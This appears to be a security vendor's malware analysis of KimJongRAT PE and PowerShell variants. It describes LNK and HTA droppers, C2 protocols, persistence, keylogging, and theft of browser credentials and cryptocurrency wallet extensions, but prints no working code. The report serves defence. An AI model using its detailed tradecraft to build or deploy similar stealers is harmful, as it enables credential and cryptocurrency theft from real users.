The initial file of the execution chain is an LNK file, but we do not yet know how attackers distribute these files. Figure 1 shows the execution flow of the most recent KimJongRAT variant.

Diagram depicting a multistage cyber attack involving various malware components and processes like dropper, downloader, decoy, DLLs, and orchestrator, interacting with Command and Control servers.
Figure 1. Malware execution chain of the latest KimJongRAT PE variant (icon sources).
  • Step 1: When double-clicked, the initial LNK file downloads an HTML Application (HTA) file from an attacker-controlled CDN account, saves it to disk and runs it as shown in Figure 1
  • Step 2: The HTA file drops three embedded files sys.dll, sexoffender.pdf and user.txt to disk
    • Sexoffender.pdf is a decoy PDF file opened by the victim's default PDF reader
    • The HTA file executes the sys.dll loader
  • Step 3: The loader uses two payload URL strings in the user.txt file to retrieve two more files named main64.log and net64.log
    • These LOG files are a new KimJongRAT stealer component and an orchestrator
  • Step 4: The orchestrator sends the collected information and data to a command and control (C2) server and awaits commands from the attackers

To more fully understand these steps, let’s examine the associated files.

PE Variant Initial LNK File

When double-clicking one of the initial LNK files, the file uses the Windows tool cmd.exe to change the current directory to the Windows %temp% folder (shown in the Local base path and Command line arguments in Figure 2) . It then uses the Windows tool curl.exe to download an HTA file named pdf.hta from a legitimate CDN provider at cdn.glitch[.]global into the %temp% directory. The attacker abuses this service to host the next and subsequent stages of the malware.

The URL for the HTA file contains a parameter v with the string 1740535190239. This string is an epoch date that translates to Wednesday, February 26, 2025, 1:59 a.m. (GMT).

Finally, the LNK runs the downloaded HTA file using the Windows tool mshta.exe as shown in Figure 2.

Command prompt screen displaying file paths and system details, with highlighted sections around the local base path and command line arguments.
Figure 2. Execution related LNK information as shown in LnkParse3.

This LNK file contains unique metadata that can be used to find additional samples. Figure 3 shows the drive serial number, Windows OS version and machine ID of the system where the LNK file was created. Additionally, there is a Korean language string 응용 프로그램 (translated: application program) in the extra data section.

Screenshot of system information and specifications, including drive types, volume names, and other serialized property details. Three sections are highlighted in blue boxes.
Figure 3. Metadata from the LNK file as shown in LnkParse3.

PE Variant First Stage HTA File

The LNK sample we analyzed downloaded and saved an HTA file named pdf.hta to the Windows %temp% directory. This HTA file contains obfuscated VBS code. Additionally, the HTA file has three embedded payloads appended after the code as Base64 text.

Figure 4 shows an excerpt of the HTA file with the obfuscated VBS code and the start of the Base64-encoded payloads.

A screenshot of a computer screen displaying a script or programming code in an integrated development environment or text editor. The displayed code includes numerical data, strings, and various programming functions.
Figure 4. Excerpt of the pdf.hta file content as shown in Visual Studio Code.

Figure 5 shows the deobfuscated version of this HTA file with the truncated Base64-encoded payloads.

Screenshot of a computer code script displayed in a text editor. Indicated by arrows from top to bottom: Start of Base64 string for second payload. Start of Base64 string for first payload. Start of Base64 string for third payload.
Figure 5. Deobfuscated version of pdf.hta as shown in Visual Studio Code.

The Base64 string for the first payload starting with JVBERi0xL is decoded through the Windows tool certutil.exe and dropped as the decoy PDF file sexoffender.pdf into the Windows %temp% directory. It is then opened by the default application for PDF files.

The Base64 string starting with aHR0cHM6L for the second payload is decoded and dropped as user.txt to the %localappdata% folder.

The third Base64 string starting with TVqQAAMAAA is decoded and dropped as sys.dll, also to the %localappdata% folder. This HTA file then runs sys.dll using rundll32.exe using sys.dll's only exported function named s.

The dropped user.txt is a text file containing URLs to the same CDN sub-directory that hosts the malicious HTA file, as shown in Figure 6.

Screen capture showing a Notepad window with two URLs listed, both pointing to LOG files.
Figure 6. The content of user.txt as shown in Windows Notepad.

The last dropped file is named sys.dll, and it downloads the files from the URLs in user.txt and executes them.

Second Stage Loader sys.dll

The second stage loader named sys.dll is a 64-bit DLL internally named baby.dll. It has a single exported function named s that contains all the malware's functionality.

When this function is called with rundll32.exe, it first checks whether the malware is running on a virtual machine or sandbox as shown in Figure 7. If that is the case, the loader deletes itself and quits. If not, it creates a mutex named co_sys_co and starts a sub-thread.

A screenshot of a computer code editor displaying several lines of C++ programming code, involving functions for file handling and system registry access.
Figure 7. Decompiled source code of exported function s from sys.dll as shown in IDA Pro.

The sub-thread checks if any previously dropped payloads are present in the %localappdata%\net directory. It uses this directory to store downloaded payloads from the attacker’s CDN stager URL.

The sys.dll loader expects any files downloaded to this folder to be encrypted data binaries with the first 16 bytes being the RC4 decryption key for the remaining bytes. When it finds a file in this folder, it decrypts, executes and finally deletes the file.

After creating the sub-thread, the malware reads the URLs from the %localappdata%\user.txt file previously dropped by the HTA file. It appends the date and time in epoch format as ?v=[epoch time] to each URL string. Afterwards, it contacts the CDN service to download the RC4-encrypted file net64.log into the %localappdata%\net folder to load it reflectively.

This net64.log file is the new KimJongRAT stealer component. It endlessly runs a loop that only exits if the file %localappdata%\micro.log.zip is present. This file is created by net64.log and contains the victim’s stolen information and data.

When micro.log.zip is detected, the sys.dll loader downloads the second RC4-encrypted file main64.log from the CDN server and stores it as notepad.log. As soon as notepad.log is written to %localappdata%\net, the sub-thread reads, decrypts, executes and deletes it. This decrypted file is the main orchestrator that implements network, backdoor and information-stealing functionality.

Third Stage Orchestrator and Backdoor

The downloaded payload main64.log is internally named NetworkService.dll and has a compilation timestamp of December 3, 2024, 7:36 a.m. UTC. Figure 8 shows its PDB file path.

Screenshot displaying a debug window focused on raw data properties, including a highlighted 'PDB FileName' field showing a path to a file.
Figure 8. PDB file path of net64.log as shown in EXE Explorer.

As noted in Figure 8, the software has a PDB file path that includes the string \research\Spyware\Advanced\Covaware. A 2019 article by ESTsecurity describes a campaign named Operation Giant Baby where attackers used malware with the same name in activity relating to our BabyShark article from the same year.

This main64.log file is the main orchestrator that handles output created by the other downloaded file net64.log. While main64.log is primarily responsible for the network communication and backdoor functionality, net64.log is responsible for stealing credentials from browser and email or FTP clients.

The main orchestrator has a single exported function named fool, which contains the majority of the malware’s functionality. The DllMain entry point is only used for various initialization routines. These routines create multiple directories associated with the base C2 URL and file paths that the malware uses later.

As a unique victim ID, main64.log uses the volume serial number. If the volume serial number cannot be obtained, main64.log uses a combination of the computer and username for the victim ID. It encodes this alternative ID value as a Base64 string, as shown in Figure 9.

Screenshot of computer code in an editor, highlighting functions and variables related to URL processing and unique ID generation. Sections of the code are annotated with comments. From top to bottom are: C2 URL. Unique ID. Alternative unique ID.
Figure 9. Decompiled C2 base URL creation function from main64.log as shown in IDA Pro.

However, this alternative ID is not used throughout the malware’s code and thus seems to be leftover code from earlier versions of this malware. After establishing the unique ID, main64.log calls the exported function fool before finally writing the clipboard data into a file.

The exported function fool shown in Figure 10 starts four threads before infinitely looping through a sleep call.

Screenshot of a computer code in an IDE, featuring functions related to thread management and keyboard logging. The top line has "fool" highlighted in yellow.
Figure 10. Decompiled C2 string creation function from main64.log as shown in IDA Pro.

These threads are named as follows:

  • main_thread
  • clipboard_log_to_netkey_file
  • keylogger_log_window_title_and_keys
  • keylogger_flush_to_netkey_file

The first thread named main_thread shown below in Figure 11 implements the network, backdoor and information stealing functionality. The other three threads are dedicated to recording keystrokes, window titles and clipboard information.

A screenshot of a computer code in an integrated development environment, featuring a function named "main_thread" highlighted in yellow that involves various operations such as loading modules, setting internet options, uploading files, and implementing a sleep command.
Figure 11. Decompiled main_thread from main64.log as shown in IDA Pro.

The network communication is implemented in an infinite loop that uploads collected data and requests commands from the C2 server. This malware implements three methods to communicate with the C2 server. To upload data or files, it uses the HTTP POST method with multipart/form-data, which we will subsequently describe as HTTP POST multi, or application/x-www-form-urlencoded, which we will call HTTP POST app. To download data, the malware uses an HTTP GET request.

Figure 12 shows the initial network capture where the stolen browser data and the system information are sent to the C2 server.

Wireshark screenshot displaying HTTP headers and other network request details with portions of the text redacted. Some of the information is also truncated.
Figure 12. Initial network communication with the C2 server as shown in Wireshark.

At first, the file micro.log.zip from the %localappdata% directory is copied into the %temp% directory as micro.log.zip_. This file is then uploaded to the C2 server with an HTTP POST multi request and the hard-coded boundary string ----------sdfaffi3457839sfhjkaskl. Before it is uploaded as a value of the key file0, the ZIP archive is XORed with the key 0xFE.

Additionally, two keys val and id with the values delete and the volume serial number are sent to the C2 server. The former is most likely a note that the original file micro.log.zip is deleted after its copy gets uploaded, while the latter is used to associate the ZIP archive to a specific victim.

The HTTP POST multi method is always used to send file data, as is the same schema described above:

  • Key: val, value: delete
  • Key: id, value: <UniqueVictimID>
  • Key: file0, value: <XORedFileData> (XOR key is always 0xFE)

The HTTP POST app method is either used to send encrypted data or to send the server-side delete command (further described as HTTP POST app delete). This delete command is used on the server side to clear out the appropriate command or feature queue. The schema is as follows for data:

  • Key: id, value: <UniqueVictimID>
  • Key: nm, value: <FeatureName>
  • Key: val, value: <XORedFileData> (XOR key is always 0xFE) or delete

Next, the malware sends an HTTP GET request to the C2 URL ending with the victim's unique directory, which it creates from the volume serial number and the filename history.log_. If the file is not already on the C2 server, the malware performs the following activities:

  • Collecting various system information
  • Writing it into a file named history.log in the %appdata% directory
  • Creating a copy of it in the %temp% directory named history.log
  • Sending it to the C2 server using the HTTP POST multi method

It collects the following system information in history.log:

  • Hostname
  • IP address
  • Computer name
  • Windows user account name
  • Disk drive information (available drives, volume names, file system names, drive types)
  • Operating system (version and product name)
  • System type (32-bit or 64-bit)
  • Internet Explorer version
  • Start menu items
  • CPU information

The initial communication sends the victim's data to the C2 server, and any additional actions from the C2 server are based on that initial data. Table 1 shows other information that is periodically uploaded to the C2 server.

Collected User Data Queried C2 URL HTTP Method (and feature) Created Local Files Comment
Search for files and directories in all directories based on a list of hard-coded file extensions and wildcards Check file URL: <C2Domain>/<UniqueVictimID>/netlist.log_ Check file URL: GET

Upload file: POST multi

 File with information: %localappdata%\netlist.log

Copy of file with information: %temp%\netlist.log_

 Search files with the extensions .hwp,
.pdf,
.doc, .docx,
.xls,
.xlsx,
.zip, .rar
.egg,
.txt,
.jpg,
.png,
.jpeg, .alz,
.ldb, and files and directories with the wildcards *wallet* and UTC--*
Upload keylogger and clipboard data Upload file data: <C2Domain> Upload file data: POST app File with information: %localappdata%\netkey The uploaded data is XORed with 0xFE

Table 1. List of collected user data that is periodically uploaded to the C2 server.

To receive instructions from the C2 server, the malware periodically sends HTTP requests through hard-coded URLs. Afterward, it deletes all files and data that it downloaded from the C2 server. Table 2 shows the implemented commands together with their URLs, HTTP methods and involved local files:

Command Description Queried C2 URL HTTP Methods Created Local Files Comments
Upload a specific file to the C2 URL Get specified file: <C2Domain>/<UniqueVictimID>/out

Upload file and delete queue: <C2Domain>

 Get specified file: GET

Upload file: POST multi

Delete queue: POST app delete

 Copy of specified file: %temp%\<SpecifiedFile><RandomNumber> The specified file is RC4-encrypted, and the uploaded file is XORed with 0xFE
Download a file into a specified directory Get file data and specified directory: <C2Domain>/<UniqueVictimID>/in

Delete queue: <C2Domain>

 Get file data and specified directory: GET

Delete queue: POST app delete

 N/A The downloaded file is RC4-encrypted
Download a file into the %localappdata%\net directory Get specified file URL: <C2Domain>/<UniqueVictimID>/cok

Delete queue: <C2Domain>

 Get specified file URL: GET

Delete queue: POST app delete

 N/A The downloaded file is RC4-encrypted
Download a file into %localappdata%\notepad.tmp Check file URL: <C2Domain>/<UniqueVictimID>/tmp64

Delete queue: <C2Domain>

 Check file URL: GET

Delete queue: POST app delete

 Downloaded file: %localappdata%\notepad.tmp -
Run a command-line command Get cmd-line command: <C2Domain>/<UniqueVictimID>/cmd

Delete queue: <C2Domain>

 Get cmd-line command: GET

Delete queue: POST app delete

 - The command is RC4-encrypted, with the first 16 bytes being the key for the remaining bytes
Search for files and directories in a specified directory based on a list of hard-coded file extensions and wildcards. Write information to a file and upload it. Get specified directory: <C2Domain>/<UniqueVictimID>/dir

Upload file and delete queue: <C2Domain>

 Get specified directory: GET

Upload file: POST multi

Delete queue: POST app delete

 File with information: %localappdata%\list.log

Copy of file with information: %localappdata%\list.log<RandomNumber>

 Search files with the extensions .hwp, .pdf, .doc, .docx, .xls, .xlsx, .zip, .rar, .egg, .txt, .jpg, .png, .jpeg, .alz, .ldb, and files and directories with the wildcards *wallet* and UTC--*

Table 2. List of backdoor commands.

Third Stage KimJongRAT Stealer

The other downloaded file net64.log is the main KimJongRAT stealer component. The decrypted file is internally named dwm.dll and has a compilation timestamp of December 15, 2024, 4:03 a.m. UTC. It has three exported functions init_engine, main_engine and stop_engine. Only the first function contains all the functionality, while the latter two only redirect execution to the entry point DllMain, which is empty.

When init_engine is executed, the malware first resolves a list of API functions using GetProcAddress(). All function strings are encoded by a simple substitution cipher where characters are changed to others according to a mapping table. The following Python script contains the reconstructed algorithm and can be used for decoding these strings:

The same cipher is used to encode other sensitive strings related to the stealer's functionality.

Based on the list of decoded function strings, the stealer attempts to retrieve information from various popular browsers and FTP or email clients. Other sensitive strings related to the stealer functionality, like the browser extension ID, are encrypted by a simple XOR-based cipher.

The malware stores the stolen data in plain text and SQLite files in a directory %temp%\[RandomName].tmp. An overview of the victim information is stored in the file %temp%\[RandomName]\micro.log. This file contains the following information:

  • Operating system information
  • CPU information
  • Process information
  • Start menu programs
  • Website/cookie/password information of supported browsers
  • Configuration and password information of supported email clients
  • Password information of supported FTP clients

The malware also searches all supported browsers for multiple cryptocurrency wallet extensions shown in Table 3.

Extension ID Extension Name
nkbihfbeogaeaoehlefnkodbefgpgknn MetaMask
egjidjbpglichdcondbcbdnbeeppgdph Trust Wallet
ibnejdfjmmkpcnlpebklmnkoeoihofec TronLink
aholpfdialjgjfhomihkjbmgjidlcdno Exodus Web3 Wallet
fhbohimaelbohpjbbldcngcnapndodjp BEW lite
mcohilncbfahbmgdjkbpemcciiolgcge OKX Wallet
bfnaelmomeimhlpmgjnjophhpkkoljpa Phantom
ejbalbakoplchlghecdalmeeeajnimhm MetaMask
pbpjkcldjiffchgbbndmhojiacbgflha OKX Wallet
bhhhlbepdkbapadjdnnojkbgioiodbic Solflare Wallet

Table 3. Searched for browser extensions with their corresponding IDs.

The extension IDs for each browser are stored in the file %temp%\[RandomName]\ext.log.

Additionally, the malware steals various SQLite database files for supported browsers found in each browser’s user data directory. For example, for Google Chrome, these files can be found in C:\Users\[UserName]\AppData\Local\Google\Chrome\User Data\Default for the default user. These database files contain detailed information about the user from browser features including bookmarks, history, saved passwords and installed extensions. The malware searches for the following in the database files:

  • Cookies
  • Login data
  • Web data

These files are copied to the %temp%\[RandomName].tmp directory and renamed by prepending the profile user and a browser indicator. The last file created in this directory contains the master encryption key derived from a browser’s Local State file. This key is needed to decrypt sensitive browser data, such as stored passwords or cookies.

Finally, these files are compressed using the PowerShell Compress-Archive command to %localappdata%\micro.log.zip. This file is then uploaded to the C2 server by the orchestrator.

Previous KimJongRAT PE Variants

We have also discovered other variants of this malware execution chain, dating back to at least August 2024. The first variants deployed 32-bit DLL files as the final stealer and orchestrator payloads, which is different from the latest variant that uses 64-bit DLL files. Also, the execution chain sometimes differs in the way that the second-stage loader drops the decoy PDF, or whether it uses the decoy PDF at all.

Other differences are that the initial LNK file does not use cmd.exe and curl.exe but instead powershell.exe with the Invoke-WebRequest command to download the next stage HTA dropper.

New KimJongRAT PowerShell Variant

This section discusses the latest variant of KimJongRAT, which uses a PowerShell information and crypto-wallet stealer as its final payload. It is very similar to the PE variant in its functionality but focuses on only stealing system and browser data.

This execution chain uses a variety of file types and is carried out in multiple stages. The initial file is an LNK file as seen in Figure 13, which illustrates the full execution chain.

Flowchart detailing a multistage malware attack involving several components like Downloader, Dropper, Decoy, Runner, Stealer, and Keylogger, each linked by directional arrows indicating the sequence of actions.
Figure 13. Malware execution chain of the latest PowerShell variant (icon sources).
  • Step 1: When double-clicked, the LNK file downloads an HTA file from an attacker-controlled CDN account to disk and runs it, as shown above in Figure 13
  • Step 2: When executed, this HTA file drops an embedded decoy PDF and a ZIP archive to disk
  • Step 3: The decoy file is opened by the default installed PDF reader, and then files from the ZIP archive are extracted and saved to disk
  • Step 4: From those extracted files, a PowerShell file loads the stealer and keylogger and sets the runner VBS script for persistence
  • Step 5: The stealer sends the collected information and data to the C2 server and awaits commands from the attackers

PowerShell Variant Initial LNK File

An example of an initial LNK file (SHA256 hash: a66c25b1f0dea6e06a4c9f8c5f6ebba0f6c21bd3b9cc326a56702db30418f189) submitted to VirusTotal is named 성범죄자 신상정보 고지.pdf.lnk (translated from Korean: “Sex Offender Personal Information Notification”). This sample is almost identical to the sample we reviewed in the PE malware chain. The only difference is that it downloads a different HTA file named sfmw.hta and uses a different value for the parameter v as shown in Figure 14.

Image showing a Windows command prompt with text displaying file path and system information for a program. Some of the information is highlighted in red boxes.
Figure 14. Execution related LNK data as shown in LnkParse3.

The LNK file’s metadata is identical to the one described in the latest PE malware execution chain.

First Stage HTA File

The downloaded sfmw.hta file is dropped into the Windows %temp% directory. This file contains VBScript code, obfuscated with the same algorithm as the one in the PE variant. Unlike the PE variant, sfmw.hta only has two embedded payloads.

Figure 15 shows an excerpt of this HTA file with the obfuscated code and one of the two Base64-encoded payloads.

Screenshot of a computer script written in VBScript, displayed in a text editor with numbered lines and syntax highlighting.
Figure 15. Excerpt of the sfmw.hta file content as shown in Visual Studio Code.

Figure 16 shows the deobfuscated version of the HTA file with the truncated Base64-encoded payloads.

A screenshot of a computer script written in VBScript displayed in a text editor with various commands for file manipulation and execution.
Figure 16. Deobfuscated version of sfmw.hta as shown in Visual Studio Code.

Figure 16 shows that the script within the HTA file uses findstr.exe with the /b parameter to locate each Base64-encoded payload within the file text. Then, the script uses certutil.exe to decode the Base64 strings.

At first, the embedded payload starting with the Base64-encoded data JVBERi0xLj is dropped as sexoffender.pdf (same filename as in the PE variant) into the Windows %temp% directory. This decoy PDF file is then opened by the default installed PDF reader and seems to be a Korean form related to sex offenders, as shown in Figure 17.

Image of a formal document in Korean, featuring a structured layout with headings, bullet points, and multiple sections of text.
Figure 17. PDF decoy document sexoffender.pdf as shown in Adobe PDF Reader.

The second payload from the HTA file is a Base64-encoded string starting with UEsDBBQAAA. This string is decoded and dropped as a ZIP archive named pipe.zip to the %localappdata% folder. The files from this archive are extracted, and the PowerShell file named 1.ps1 is run. The other unpacked file named 1.log is passed as an argument to the PowerShell file.

Figure 18 shows that the pipe.zip archive contains four files.

A screenshot displaying a file explorer window with a list of four files, along with details including file size, packed size, and timestamps for modified, created, and accessed dates. All files have an attribute set to 'A'.
Figure 18. Files contained in pipe.zip as shown in 7-Zip.

Components of this malware were created in September 2024, as shown in the Modified, Created and Accessed dates of the files 1.ps1 and 1.vbs. The files 1.log and 2.log that contain the Base64-encoded PowerShell stealer were updated in March 2025.

Table 4 shows the names and SHA256 hashes of these files.

Filename Hash
1.log ab8862628584aa429fe7614d1c674bbdf324fa2668c4d3c94670cf6b6db597f6
1.ps1 97d1bd607b4dc00c356dd873cd4ac309e98f2bb17ae9a6791fc0a88bc056195a
1.vbs f73164bd4d2a475f79fb7d0806cfc3ddb510015f9161e7dce537d90956c11393
2.log 3589c871b56cf76ce28c6be914b206afe977ec13b0894f56e05c5772a3c7e495

Table 4. Files contained in pipe.zip.

Second Stage PowerShell Stealer

The PowerShell file 1.ps1 shown in Figure 18 is a simple loader that decodes and runs the Base64-encoded file 1.log that is passed as an argument. It executes the PowerShell code with the Invoke-Expression alias iex as shown in Figure 19.

Image of a code snippet in PowerShell using functions to convert a string from Base64 encoding.
Figure 19. PowerShell code of 1.ps1 as shown in Visual Studio Code.

The decoded script in 1.log is a PowerShell stealer with backdoor functionality. This malware can be logically divided into three parts:

  • Header
  • Malware functionality
  • Main function logic

The header defines several variables and performs a simple anti-VM check as shown in Figure 20.

Screenshot displaying a PowerShell script snippet with conditional logic to check for VMware and delete specific log files from a computer system.
Figure 20. Variable definitions and anti-VM check of the PowerShell stealer as shown in Visual Studio Code.

The header part creates a new directory in the Windows %temp% folder named after the system’s UUID retrieved from the WMI ComputerSystemProduct class, and it defines a few path variables and the C2 URL. Additionally, this part checks whether the victim host is a VMware virtual machine based on the UUID serial number value. If it is a VMware system, the malware deletes itself and then exits. However, this anti-VM check is flawed, as the retrieved UUID does not contain any VM-related strings in comparison to other fields of the same WMI class.

The second part of the malware is its functionality. This part consists of multiple functions, shown in Figure 21.

Screen of code with syntax highlighting showing functions named UploadFile, Unprotect-Data, GetExWFile and several more, with line numbers.
Figure 21. Folded functions of the PowerShell stealer as shown in Visual Studio Code.

Table 5 shows an overview of these functions.

Function Name Description
UploadFile Uploads a file from a specified path to a provided URL, appending “&ap=1” to the URL after the first of each chunk. It also has an optional tag string parameter, which is used to create a unique filename along with a random number.
Unprotect-Data Takes a Base64-encoded encrypted string, decodes it and decrypts the resulting data using the current user's data protection scope. It then writes the decrypted data to a file at the specified path.
GetExWFile Explained in more detail below.
GetBrowserData Explained in more detail below.
Init Collects comprehensive system information, including operating system, CPU, disk, volume, network adapter details, running processes and installed software. It then writes this information to a text file info.txt located at $tempPath\$id.
DownloadFile Downloads a file from a specified URL and saves it to a specified file path.
CreateFileList Described in more detail below.
RegisterTask Described in more detail below.
Send Compresses a specified directory into a ZIP archive, which it then renames to init.dat and constructs a URL by appending the BIOS ID to the C2 base URL. It then uploads the init.dat file to this URL and, if successful, deletes the contents of the specified directory and the init.dat file.
Get-ShortcutTargetPath Retrieves the target path of a specified Windows shortcut by creating a COM object of WScript.Shell and using its CreateShortcut method.
RecentFiles Retrieves the target paths of all recent files (shortcuts) in the user's Windows account and appends them to a text file recent.txt.
Work Described in more detail below.

Table 5. Overview of the PowerShell functions used in the stealer.

The GetBrowserData function is designed to extract various types of data from multiple browsers, including Edge, Chrome, Naver Whale and Firefox. This function uses another function named GetExWFile to manage specific data associated with cryptocurrency wallet browser extensions. Figure 22 shows an excerpt of the GetBrowserData function. This excerpt indicates the malware is still in development with many lines of code commented out.

A screenshot of computer code with syntax highlighting, showing the function "GetBrowserData" with various coding elements.
Figure 22. GetBrowserData function as shown in Visual Studio Code.

During the data extraction process, the GetBrowserData function uses three hash tables to map specific extension IDs to their corresponding names. Table 6 shows all hashes with their corresponding extensions.

Extension ID Extension Name
nkbihfbeogaeaoehlefnkodbefgpgknn MetaMask
egjidjbpglichdcondbcbdnbeeppgdph Trust Wallet
ibnejdfjmmkpcnlpebklmnkoeoihofec TronLink
aholpfdialjgjfhomihkjbmgjidlcdno Exodus Web3 Wallet
fhbohimaelbohpjbbldcngcnapndodjp BEW lite
mcohilncbfahbmgdjkbpemcciiolgcge OKX Wallet
bfnaelmomeimhlpmgjnjophhpkkoljpa Phantom
ejbalbakoplchlghecdalmeeeajnimhm MetaMask
pbpjkcldjiffchgbbndmhojiacbgflha OKX Wallet
opfgelmcmbiajamepnmloijbpoleiama Rainbow
phkbamefinggmakgklpkljjmgibohnba Pontem Crypto Wallet
dmkamcknogkgcdfhhbddcghachkejeap Keplr
nphplpgoakhhjchkkhmiggakijnkhfnd TON Wallet
jbppfhkifinbpinekbahmdomhlaidhfm iWallet Pro
aiifbnbfobpmeekipheeijimdpnlpgpp Station Wallet
bhhhlbepdkbapadjdnnojkbgioiodbic Solflare Wallet
jblndlipeogpafnldhgmapagcccfchpi Kaika Wallet
fpkhgmpbidmiogeglndfbkegfdlnajnf Cosmostation Wallet
onhogfjeacnfoofkfgppdlbmlmnplgbn SubWallet
pdliaogehgdbhbnmkklieghmmjkpigpa Bybit Wallet
acmacodkjbdgmoleebolmdjonilkdbch Rabby Wallet
aflkmfhebedbjioipglgcbcmnbpgliof Backpack
fnjhmkhhmkbjkkabndcnnogagogbneec Ronin Wallet
ppbibelpcjmhbdihakflkdcoccbgbkpo UniSat Wallet
anokgmphncpekkhclmingpimjmcooifb Compass Wallet
dlcobpjiigpikoobohmabehhmhfoodbb Argent X Starknet Wallet
efbglgofoippbgcjepnhiblaibcnclgk Martian Aptos & Sui Wallet
ejjladinnckdgjemekebdpeokbikhfci Petra Aptos Wallet
fcfcfllfndlomdhbehjjcoimbgofdncg Leap Cosmos Wallet
jnlgamecbpmbajjfhmmmlhejkemejdma Braavos Starknet Wallet
fijngjgcjhjmmpcmkeiomlglpeiijkld Talisman Wallet
mkpegjkblkkefacfnmkajcjmabijhclg Magic Eden Wallet
aeachknmefphepccionboohckonoeemg Coin98 Wallet
idnnbdplmphpflfnlkomgpfbpcgelopg XVerse Wallet
dmkamcknogkgcdfhhbddcghachkejeap Keplr
nnpmfplkfogfpmcngplhnbdnnilmcdcg Uniswap
bfnaelmomeimhlpmgjnjophhpkkoljpa Phantom
opcgpfmipidbgpenhmajoajpbobppdil Sui Wallet
hnfanknocfeofbddgcijnmhnfnkdnaad Coinbase Wallet
kkpllkodjeloidieedojogacfhpaihoh Enkrypt

Table 6. Searched for browser extensions with their corresponding IDs.

The GetExWFile function retrieves files associated with these extensions, based on the specific handling procedures defined for each of the hash tables. The function begins by attempting to retrieve the encrypted master key from the local user's data for each browser.

If the browser process is running, it halts the process to avoid file access conflicts. Then, it navigates through all user profiles for each browser within the User Data directory. For every user profile, it duplicates various data types, such as Login Data and Bookmarks, to a new location.

For Edge, Chrome and Naver Whale, the GetExWFile function processes data related to browser extensions. It receives the browser's name, the profile path and the profile name as arguments. After it duplicates the necessary data, the function enumerates all extensions installed for the user profile and appends this list to a text file named extensions.txt. If the browser process was initially running, this function restarts the process once it has copied all the data.

For Firefox, the function specifically copies certain files (key4.db, key3.db, cookies.sqlite, logins.json) associated with each user profile.

The CreateFileList function scans all file system drives on the system, specifically targeting the Users directory on the C:\ drive. It searches for files with extensions shown in Table 7.

Extensions File Association
.doc, .docx, .xls, .xlsx Microsoft Office
.hwp, .hwpx Hancom Office
.txt, .csv, .pdf, .log Text related
.jpg, .jpeg, .png Images
.rar, .zip, .alz Archives
.ldb Microsoft Access lock
.eml Email

Table 7. List of files with their extensions that the stealer is looking for.

Additionally, the CreateFileList function searches for any files matching the name patterns of various cryptocurrency-related terms and names as shown in Figure 23.

Screenshot of a computer screen displaying a PowerShell script used for handling file management operations.
Figure 23. CreateFileList function as shown in Visual Studio Code.

All matching files are then written into a text file named FileList.txt.

The RegisterTask function shown in Figure 24 creates an entry in the Windows registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run key for persistence. For this, it creates an entry named WindowsSecurityCheck and uses the file path to 1.vbs previously dropped from the ZIP archive.

Screenshot of computer code using PowerShell functions, including commands such as "RegisterTask."
Figure 24. RegisterTask function as shown in Visual Studio Code.

A commented-out code line in 1.ps1 (see Figure 24, line 409) indicates it has run 1.log directly in the malware code at some point. This functionality has been outsourced to the external file 1.vbs, which contains VBScript code obfuscated by the same algorithm as for all other files. Figure 25 below shows its deobfuscated version.

Screenshot of a Visual Studio Code interface showing a section of JavaScript code to create an object named WScript.shell.
Figure 25. VBScript code of 1.vbs as shown in Visual Studio Code.

The last function Work continuously interacts with the C2 server, cycling through a set of operations as shown in Figure 26. This function is similar to the procedure of the PE variant. It periodically uploads the collected data and provides the attacker with backdoor functionality. This includes uploading any additional files to the C2 server or downloading and running additional PowerShell payloads to the victim’s system.

Screenshot of a computer script in a programming interface for the function Work, including function definitions and commands primarily related to web operations. The syntax is highlighted for readability.
Figure 26. Excerpt of the Work function as shown in Visual Studio Code.

The control flow is as follows:

  1. The function is initiated by pausing for 600 seconds.
  2. It then constructs a URL <C2URL>?id=<UUID>&ap=1 to upload a file named k.log to the C2 server. The keylogger module creates this file.
  3. After the upload, the function deletes the file k.log from the local machine.
  4. It downloads a string from a server URL <C2URL>?id/rd and splits it into lines. For each line, which is a provided file path, it constructs a URL <C2URL>?id=<UUID> and uploads the file to the server. Afterwards, it sends a GET request to a URL <C2URL>?id=<UUID>&del=rd to delete the read string from the server.
  5. Next, it downloads a string from another server URL <C2URL>?id/wr and splits it into lines. For each line, it extracts the filename, constructs a URL <C2URL>?id=<UUID>/<FileName> and downloads this file from the server to the victim’s system. It then sends a GET request to a URL <C2URL>?id=<UUID>&del=<FileName> to delete the file from the server.
  6. It downloads a string from a C2 server URL <C2URL>?id/cm and executes the string as a command using Invoke-Expression. This string can be any PowerShell code but is likely used to run additional payloads dropped previously. After execution, it sends a GET request to a URL <C2URL>?id=<UUID>&del=cm to delete the string on the server.
  7. The function repeats this entire process indefinitely.

During our analysis of this malware, we did not observe any data returned from the C2 server.

The last of the three parts of the stealer’s code is the main function logic shown in Figure 27.

A screenshot of a computer script in a text editor, including various command lines and a PowerShell command, which is prominent in the display. The script includes tasks like registering a task, initiating and getting browser data.
Figure 27. Main function logic as shown in Visual Studio Code.

First, this section creates the malware persistence in the registry and then collects system information and browser data. Next, it runs the file 2.log using the PowerShell loader script 1.ps1 before it finally sends all data to the C2 server and waits for the attacker’s commands.

The file 2.log is a keylogger module that captures and records keystrokes, window titles and clipboard content as shown in Figure 28. This module writes the recorded data into a log file named k.log, which is uploaded to the C2 server in the Work function.

Screenshot of a computer script displayed in a text editor with dark background, showing several lines of code written in PowerShell for the Keylog function. The code involves functions related to capturing and managing keyboard input.
Figure 28. Base64-decoded keylogger code of 2.log as shown in Visual Studio Code.

Previous Version of KimJongRAT PowerShell Variant

We’ve found a previous version of the PowerShell variant that only differs slightly from the most recent one. The main differences are in the PowerShell script in the stealer.

The initial LNK file downloads an HTA file named prevenue.hta from an attacker-controlled cdn.glitch[.]global URL. The URL to the HTA file contains the value 1742020326408 for the parameter v. This value is the time in epoch format for Saturday, March 15, 2025, 6:32 a.m. (GMT). The LNK file’s metadata is identical to the one used in the most recent version.

The downloaded HTA file named prevenue.hta is almost identical to the HTA file used in the most recent version. The only differences are the embedded decoy PDF file dropped as revenue.pdf and the embedded ZIP archive containing a previous version of the PowerShell stealer.

The decoy PDF file shown in Figure 29 seems to be a tax revenue-related document of a person from the South Korean city of Sejong.

Image shows a form featuring various sections with personal details, registration number, and a QR code, all displayed in Korean characters.
Figure 29. PDF decoy document revenue.pdf as shown in Adobe PDF Reader.

Figure 30 shows the contents of the ZIP archive again dropped as pipe.zip.

A screenshot showing a list of four files in a file explorer, detailing their size, packed size, modified, created, and accessed dates, as well as attributes.
Figure 30. Files contained in pipe.zip as shown in 7-Zip.

